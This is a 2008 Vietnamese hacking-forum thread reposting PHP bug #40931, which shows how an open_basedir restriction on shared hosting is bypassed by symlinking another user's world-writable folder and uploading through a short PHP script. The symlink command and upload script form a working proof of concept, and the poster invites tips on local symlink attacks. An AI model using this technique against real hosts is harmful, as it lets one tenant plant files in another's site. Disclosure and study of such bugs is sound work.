banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits local bypass user via symlink  XML
  [Discussion]   local bypass user via symlink 25/02/2008 06:46:09 (+0700) | #1 | 116495
ly0kha
Member

[Minus]    0    [Plus]
Joined: 21/10/2007 10:35:38
Messages: 8
Offline
[Profile] [PM]
Mình nhớ là đã post bài này rồi mà tìm lại không thấy.xin được pót lại nếu trùng các mod xóa dùm.
bài này trên http://bugs.php.net/bug.php?id=40931

Bug #40931 open_basedir bypass via symlink and move_uploaded_file()
Description:
------------
User can bypass open_basedir restriction by move_uploaded_file() if
target file path is symlink to any directory.

Reproduce code:
---------------
user1 will upload file to user2's /home/user2/public_html folder.

We have in /etc/passwd:
user1:32001:32001::/home/user1:/bin/bash
user2:32002:32002::/home/user2:/bin/bash

Target folder allows to write for anybody:
# ls -lA /home/user2
drwxrwxrwx 2 user2 user2 4096 Mar 27 17:31 public_html/

Apache have mod_php intalled. Apache config for user1:
<VirtualHost xxx.xxx.xxx.xxx>
ServerName user1.xxxxxxx.com
DocumentRoot /home/user1/public_html
User user1
php_admin_value open_basedir "/home/user1"
</VirtualHost>

User user1 can do something like:

$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body>

<?
if ( isset($_FILES["userfile"]) ) {
echo "Upload ";
if (move_uploaded_file
($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_h
tml/file.ext"))
echo "ok";
else echo "failed";
}

?>

<form name="uplform" method="post" action="<?=$PHP_SELF?>"
enctype="multipart/form-data">
<input type="file" name="userfile">
<input type="submit">

</body></html>' > upload.php

Expected result:
----------------
If we access http://user1.xxxxxxx.com/upload.php after file upload
expected message
"Upload failed"
and no file
/home/user2/public_html/file.ext
in target folder.

Actual result:
--------------
If we access http://user1.xxxxxxx.com/upload.php after file upload we
got message
"Upload ok"
and file
/home/user2/public_html/file.ext
well exist in target folder.
 

Các bác vào thảo luân với.hoặc nếu các bác có kinh nghiệm nào local áp dụng symlink thì vui lòng chia sẻ chút ít.
[Up] [Print Copy]
  [Question]   Re: local bypass user via symlink 23/03/2008 09:03:57 (+0700) | #2 | 120734
[Avatar]
zatuzik
Member

[Minus]    0    [Plus]
Joined: 02/05/2005 18:11:52
Messages: 4
Offline
[Profile] [PM]
Có khả năng upload mỗi tội khi upload xong the name of file is renamed smilie for example , i upload a file with name zatuzik.php , after uploading the name is renamed to 0aef023 .
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|